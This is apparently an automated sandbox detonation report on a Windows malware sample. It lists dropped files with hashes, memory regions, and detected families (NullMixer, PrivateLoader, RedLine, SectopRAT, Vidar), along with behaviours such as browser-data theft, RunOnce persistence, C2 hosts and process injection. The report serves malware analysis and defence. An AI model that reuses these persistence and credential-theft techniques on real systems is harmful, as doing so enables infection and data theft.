memory/1000-108-0x0000000005200000-0x000000000520A000-memory.dmp

memory/1000-109-0x0000000005590000-0x000000000562C000-memory.dmp

memory/4800-99-0x0000000003100000-0x0000000003106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

memory/4876-80-0x0000000000A70000-0x0000000000A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1320-129-0x00000000020A0000-0x0000000002184000-memory.dmp

memory/1004-120-0x0000000000CA0000-0x0000000000CB0000-memory.dmp

memory/3640-143-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/3016-150-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/3016-159-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-158-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3016-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-156-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-154-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3312-160-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/1000-161-0x0000000004CB0000-0x0000000004CC2000-memory.dmp

memory/2380-171-0x0000000000400000-0x0000000003346000-memory.dmp

memory/3640-172-0x0000000000770000-0x000000000084D000-memory.dmp

memory/1004-175-0x0000000001A90000-0x0000000001AA2000-memory.dmp

memory/1004-174-0x0000000001A60000-0x0000000001A6E000-memory.dmp

memory/1000-188-0x000000000A2A0000-0x000000000A32C000-memory.dmp

memory/1000-189-0x0000000006F20000-0x0000000006F3E000-memory.dmp

memory/4760-190-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

memory/4760-199-0x0000000005860000-0x0000000005E78000-memory.dmp

memory/4760-200-0x00000000052A0000-0x00000000052B2000-memory.dmp

memory/4760-201-0x0000000005340000-0x000000000537C000-memory.dmp

memory/2656-202-0x00000000048E0000-0x0000000004916000-memory.dmp

memory/2656-204-0x0000000004F60000-0x0000000005588000-memory.dmp

memory/4760-203-0x0000000005380000-0x00000000053CC000-memory.dmp

memory/2656-207-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/2656-206-0x0000000005700000-0x0000000005766000-memory.dmp

memory/2656-205-0x0000000004F20000-0x0000000004F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4xfsz0p.s1q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4760-219-0x00000000055E0000-0x00000000056EA000-memory.dmp

memory/2656-220-0x00000000058E0000-0x0000000005C34000-memory.dmp

memory/2656-221-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/2656-223-0x0000000006480000-0x00000000064B2000-memory.dmp

memory/2656-224-0x0000000073EB0000-0x0000000073EFC000-memory.dmp

memory/2656-234-0x00000000064C0000-0x00000000064DE000-memory.dmp

memory/2656-235-0x00000000070C0000-0x0000000007163000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

memory/2656-242-0x0000000007820000-0x0000000007E9A000-memory.dmp

memory/2656-243-0x00000000071E0000-0x00000000071FA000-memory.dmp

memory/2656-244-0x0000000007250000-0x000000000725A000-memory.dmp

memory/2656-250-0x0000000007460000-0x00000000074F6000-memory.dmp

\??\pipe\LOCAL\crashpad_4092_YTVGSEXPLPVIISPH

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e613877ba30067611bb2c2e1e8c02eb
SHA1 3e5528270361b8c0e22a97e80db1da62a4a1a469
SHA256 b23176c536f1299706fe85369e026a879fcf98bf8fc8381be77dec95c6605a6b
SHA512 849c3e758963994ebe001e10aba8662022a0be15596180772f21c060936f118c4e46f86f62ab7f0f780111e9fc1516925144bb9d5de72490f849bd4de6d9b872

memory/2656-262-0x00000000073E0000-0x00000000073F1000-memory.dmp

memory/2656-263-0x0000000007410000-0x000000000741E000-memory.dmp

memory/2656-264-0x0000000007420000-0x0000000007434000-memory.dmp

memory/2656-265-0x0000000007520000-0x000000000753A000-memory.dmp

memory/2656-266-0x0000000007500000-0x0000000007508000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 acb4fa771a71663077ce1b9eac1bab3a
SHA1 797008a96ec3e23ec74289d49ae9120028045070
SHA256 366c2581a3ce28374993d73565640180a949078578d9b9b895dffdcb218f979e
SHA512 15100fe991300e962749bb2c7d41106963c00c6cf0b1488efb4f4e14edeb3744422e19399a83200fe94b7953f5297f9c44fa92b1ad1070b57bd7a6bce45dcb32

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9ab891abd4504574742cc01b982add54
SHA1 45f1cb1d9a537e94662093e7b5f55c16fd6b2bf2
SHA256 1c3c8c2a8c254349999ef71657ae94efdbabf12f2a31ac29bd0b45f55e1b9242
SHA512 9d0b46a56dfb4f0538ffa04e3e08a567c426e2408f0123e93a77b44f9761042f2c4b72495add71240840d52bd6ade7699fa1a72f4f2e2a07bc24fb854908a979

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/5444-315-0x0000000000140000-0x0000000000146000-memory.dmp

memory/5580-318-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-319-0x0000000000890000-0x00000000008B0000-memory.dmp

memory/5580-317-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-321-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-325-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-324-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-323-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-322-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-326-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-327-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-347-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win7-20240903-en

Max time kernel

56s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1912 set thread context of 1360 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7C7DF041-B3CB-11EF-9C44-E61828AB23DD} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
